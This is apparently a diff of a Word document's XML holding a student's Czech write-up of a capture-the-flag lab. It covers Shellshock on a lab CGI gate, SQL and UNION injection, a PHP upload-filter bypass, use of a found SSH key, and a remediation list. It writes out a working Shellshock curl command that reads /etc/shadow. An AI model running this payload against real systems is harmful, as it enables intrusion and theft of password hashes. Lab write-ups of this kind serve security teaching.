           <w:bCs/>
-          <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Port 21/tcp: ftp (Open)</w:t>
+        </w:rPr>
+        <w:t>Port 21 ftp (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -673,552 +418,26 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
         <w:t>10.89.1.158</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Name servery: 10.89.47.1 a 10.89.1.1 (z </w:t>
-      </w:r>
-      <w:r>
-        <w:t>./LinEnum.sh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Zranitelnosti</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
       <w:r>
-        <w:t>Zranitelnosti</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Nalezení </w:t>
-      </w:r>
-      <w:r>
-        <w:t>tajemství</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Připojovací stanici jsem ve složce </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/.hints </w:t>
-      </w:r>
-      <w:r>
-        <w:t>následující popis pěti tajemství A-E:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The secret A is hidden deep down in the shadow of the Iron Fortress. Although the gate used to be hard as a shell, nowadays it looks like it could easily crumble from a shock. A marking at the base of the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>gate shows the number: 2014-6271. It seems like the housekeeper of the Iron Fortress forgot to upgrade the defences of his house.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Jedná se o tajemství na serveru </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.15</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">7. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Pomocí příkazu curl jsem si stáhl obsah http stránku.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Z ní je možné vyčíst, že obsahuje odkaz na </w:t>
-      </w:r>
-      <w:r>
-        <w:t>/cgi-bin/gate</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. S kombinací s tipem  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>2014-6271</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">lze odvodit, že jde o zranitelnost </w:t>
-      </w:r>
-      <w:r>
-        <w:t>shell shock (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>CVE-2014-6271</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Pomocí </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t>curl</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> jsem otestoval, že je skutečně možné využít shell shock.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Vyzkoušel jsem příkazy jako </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t>ls</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t>cat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, ty ale nebyli úspěšné. Místo cat jsem zkusil:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>while read line; do echo \$line; done &lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> „cesta k souboru/soubor“,  který už fungoval. Zkoušel jsem ho na citlivé soubory a eventuálně jsem narazil na </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/etc/shadow, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">kde bylo </w:t>
-      </w:r>
-      <w:r>
-        <w:t>tajemství A</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Příkaz na získání tajemství</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>curl http://10.89.1.157/cgi-bin/gate -H "User-Agent: () { :; }; echo Content-Type: text/plain; echo; while read line; do echo \$line; done &lt; /etc/shadow"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis2"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>B</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>King of Edoras holds secret B hidden to everyone.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>He keeps the secret in his private space where only him can access it.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Not even his very close elven friend - admin, who shares many secrets with the king - cannot access it. However, while the king keeps an eye on his secret, he may overlook access restrictions to some other important files. Find out how to control his friend - admin - and search some other interesting files to find out, how to bypass the king's guards. Perhaps, you should start gathering other information about his friend somewhere else.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis2"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>C</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Secret C is easily retrieved from lousy workers at the elven kingdom. They barely check the outside of the incoming packages, let alone the insides. All they do is check the outsides and look on the lable, which describes the insides. Snuck a fake, possibly malicious package - a php script-like payload - through the input checkers and the secret is yours.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis2"/>
-        <w:ind w:left="1418" w:hanging="851"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>D</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The dark forest is a place of many webs and bugs, some of them hardly visible. Those who can not find their way should verify themselves to the forest and the way shall be pointed to them. Once you arrive to the right place, perhaps ask not only about items, but about the contents of the previous verification too. Some </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>say</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the best way to approach this task is through union.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Jedná se o tajemství na serveru </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>10.89.1.159</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Pomocí příkazu curl jsem si stáhl obsah http stránky.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Je možné se odkázat na </w:t>
-      </w:r>
-      <w:r>
-        <w:t>authentication.html</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, který obsahuje formu s jménem a heslem, a upload</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.html</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, který má formu pro uložení souboru. </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis2"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>E</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>On thing is for sure - you are always welcome here in the house of Elrond. Your old friend said, that he has an interesting artefact. A chest with a damaged lid - to a common bystander, this chest looks like a junk. But Elrond is very persistent - he knows that the chest hides something.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>V</w:t>
-      </w:r>
-      <w:r>
-        <w:t> domácí složce uživatele jsem našel .ssh, v které jsem následně našel</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> priv</w:t>
-      </w:r>
-      <w:r>
-        <w:t>átní ssh</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">klíč a configuraci </w:t>
-      </w:r>
-      <w:r>
-        <w:t>pro ssh připojení uživatele elrond využívající tento klíč. Chybělo ale nastavení HostName. Jelikož v době mého řešení už nebyli dostupné hostname jednotlivých serverů, zkusil jsem se připojit na servery podporující ssh.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Příkazem</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t>ssh -i ~/.ssh/id_rsa elrond@10.89.1.156</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>jsem se</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> připojil k</w:t>
-      </w:r>
-      <w:r>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>servru</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. Zkusil jsem pomocí příkazu </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t>hostname</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> zjistit jméno serveru, ale výsledek </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t>a873d388b394</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> nebyl moc nápomocný</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Věci,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> co jsem udělal</w:t>
+        <w:t>10.89.1.157</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1226,25 +445,37 @@
         <w:pStyle w:val="Odstavecseseznamem"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
+          <w:numId w:val="9"/>
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Přidání uživatele user do root skupiny</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis1"/>
+        <w:t>Zranitelnost shell shock přes /cgi-bin/gate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
         <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Užitečné věci</w:t>
+        <w:t>Aktualizace bash na nejnovější verzi</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> nebo jiné řešení než </w:t>
+      </w:r>
+      <w:r>
+        <w:t>/cgi-bin/gate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>10.89.1.158</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1252,14 +483,930 @@
         <w:pStyle w:val="Odstavecseseznamem"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
+          <w:numId w:val="9"/>
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">curl -I http://10.89.1.157 </w:t>
+        <w:t xml:space="preserve">Login pro admina je na serveru </w:t>
+      </w:r>
+      <w:r>
+        <w:t>10.89.1.159</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Odstranění záznamů nebo aspoň hashování hesel.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Viditelný </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/etc/shadow</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Přístup by měl mít pouze root.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">admin a theodon </w:t>
+      </w:r>
+      <w:r>
+        <w:t>mají stejné heslo (a hash hesla)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Nucené silnější hesla</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>10.89.1.159</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Na </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>upload.php</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> je možná uložit php skript (s hlavičkou obrázku a správnými příponami, např. file.jpeg.php)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Lepší kontrola MIME typu, lepší REGEX pro jméno souboru.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>authenticate.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">lze přejít jednoduchým SQL injection, zobrazí tak </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>list.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Použití parametrizovaných dotazů</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> místo dynamických sestavených příkazů.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Na </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>list.php</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">lze </w:t>
+      </w:r>
+      <w:r>
+        <w:t>přes UNION</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SQL injection, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>zobrazit data z tabulky users, kde jsou nešifrovaná data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hashování hesel</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> v tabulce.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>10.89.1.156</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Odstavecseseznamem"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Na serveru jsem nezjistil žádnou potřebnou zranitelnost pro získání tajemství, stačilo </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">využít konfiguraci v .ssh a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">použít ssh klíč pro připojení a stáhnout soubor chest.img. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Nalezení tajemství</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>The secret A is hidden deep down in the shadow of the Iron Fortress. Although the gate used to be hard as a shell, nowadays it looks like it could easily crumble from a shock. A marking at the base of the gate shows the number: 2014-6271. It seems like the housekeeper of the Iron Fortress forgot to upgrade the defences of his house.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Jedná se o tajemství na serveru 10.89.1.157. Pomocí příkazu curl jsem si stáhl obsah http stránku. Z ní je možné vyčíst, že obsahuje odkaz na /cgi-bin/gate. S kombinací s </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tipem 2014</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">-6271 lze odvodit, že jde o zranitelnost </w:t>
+      </w:r>
+      <w:r>
+        <w:t>shell shock (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>CVE-2014-6271</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Pomocí </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>curl</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> jsem otestoval, že je skutečně možné využít shell shock.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Vyzkoušel jsem příkazy jako </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>ls</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>cat</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, ty ale nebyli úspěšné. Místo cat jsem </w:t>
+      </w:r>
+      <w:r>
+        <w:t>používál</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>while read line; do echo \$line; done &lt; „cesta k souboru/soubor“</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,  který už fungoval. Zkoušel jsem ho na citlivé soubory a eventuálně jsem narazil na /etc/shadow, kde bylo tajemství A</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Také to odpovídá nápovědě z tajemství „</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>deep down in the shadow of the Iron Fortress</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Příkaz na získání tajemství</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="typewrite"/>
+      </w:pPr>
+      <w:r>
+        <w:t>curl http://10.89.1.157/cgi-bin/gate -H "User-Agent: () { :; };  echo; while read line; do echo \$line; done &lt; /etc/shadow"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>B</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>King of Edoras holds secret B hidden to everyone.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>He keeps the secret in his private space where only him can access it.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
